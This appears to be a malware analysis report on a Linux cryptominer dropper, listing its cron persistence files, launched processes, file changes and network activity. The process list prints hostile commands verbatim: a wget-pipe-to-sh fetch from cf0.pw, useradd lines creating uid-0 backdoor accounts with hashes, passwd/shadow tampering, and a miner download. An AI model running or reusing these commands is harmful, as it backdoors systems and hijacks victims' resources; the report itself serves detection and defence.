Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/cron.hourly/1
- /etc/cron.hourly/.placeholder
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
Malicious functions:
Gets access to SSH keys
- /root/.ssh/authorized_keys
Launches processes:
- sh -c wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1
- wget http://cf0.pw/0/etc/cron.hourly/0 -O-
- sh
- sed -i /^[^:]\+:x:0:/{/^root:/!d} /etc/passwd
- sed -i /^$/d /etc/passwd
- sed -i /^$/d /etc/shadow
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$f344a097$L.vnLN/nzsnLirq5nMTBg. sudev
- nscd -i passwd
- nscd -i group
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$.bHtz1HY$eNtJowby1b0WVTgQT2bLu/ jewbags
- rm -f /etc/cron.hourly/1
- mkdir -p /root
- mkdir -p /root/.ssh
- wget http://cf0.pw/log/ -O /dev/null
- chmod +x /etc/cron.hourly/0
- chmod +x /etc/cron.daily/0
- chmod +x /etc/cron.weekly/0
- chmod +x /etc/cron.monthly/0
- apt-get install wget curl -y
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- pkill -9 xmrig
- grep rbdYSfTEtykGg /root/.ssh/authorized_keys
- mkdir -p /usr/libexec
- chmod 755 /root /root/.ssh /root/.ssh/authorized_keys
- chown root:root /root /root/.ssh /root/.ssh/authorized_keys
- rm -f /usr/libexec/x
- wget http://cf0.pw/0/xmr.tgz -O /usr/libexec/x
Attempts to kill the following processes:
- killall -9 xmrig
Kills the following processes:
- /usr/lib/apt/methods/http
Performs operations with the file system:
Modifies file access rights:
- /etc/sedO4OuUq
- /etc/sed1sa40A
- /etc/sedald1eH
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
- /root
- /root/.ssh
- /root/.ssh/authorized_keys
Creates folders:
- /root/.ssh
- /usr/libexec
Creates symlinks:
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/shadow.lock"
Creates or modifies files:
- /etc/sedO4OuUq
- /etc/sed1sa40A
- /etc/sedald1eH
- /etc/.pwd.lock
- /etc/passwd.692
- /etc/group.692
- /etc/gshadow.692
- /etc/subuid.692
- /etc/subgid.692
- /etc/shadow.692
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /etc/passwd.697
- /etc/group.697
- /etc/gshadow.697
- /etc/subuid.697
- /etc/subgid.697
- /etc/shadow.697
- /etc/ld.so.preload
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /usr/libexec/x
Deletes files:
- /etc/passwd.692"
- /etc/group.692"
- /etc/gshadow.692"
- /etc/subuid.692"
- /etc/subgid.692"
- /etc/shadow.692"
- /etc/shadow.lock"
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/passwd.697"
- /etc/group.697"
- /etc/gshadow.697"
- /etc/subuid.697"
- /etc/subgid.697"
- /etc/shadow.697"
- /etc/cron.hourly/1"
- /usr/libexec/x"
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
- 19#.##.242.89:80
- 21#.##1.132.250:80
- 21#.##1.132.32:80
- [2#########:0:216:35ff:fe7f:be4f]:80
- [2#########:1:216:35ff:fe7f:6ceb]:80
- [2#######8:dc41:100::233]:80
HTTP GET requests:
- cf#.####/etc/cron.hourly/0
- cf#.pw/log/
- ft#.##.######.#####ebian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_i386.deb
- se######.######.######ol/updates/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_i386.deb
- se######.######.#####ool/updates/main/c/curl/curl_7.38.0-4%2bdeb8u5_i386.deb
- cf#.##/0/xmr.tgz
DNS ASK:
- cf#.pw
- se####ty.debian.org
- ft#.##.debian.org
Other:
Collects CPU information
Collects RAM information
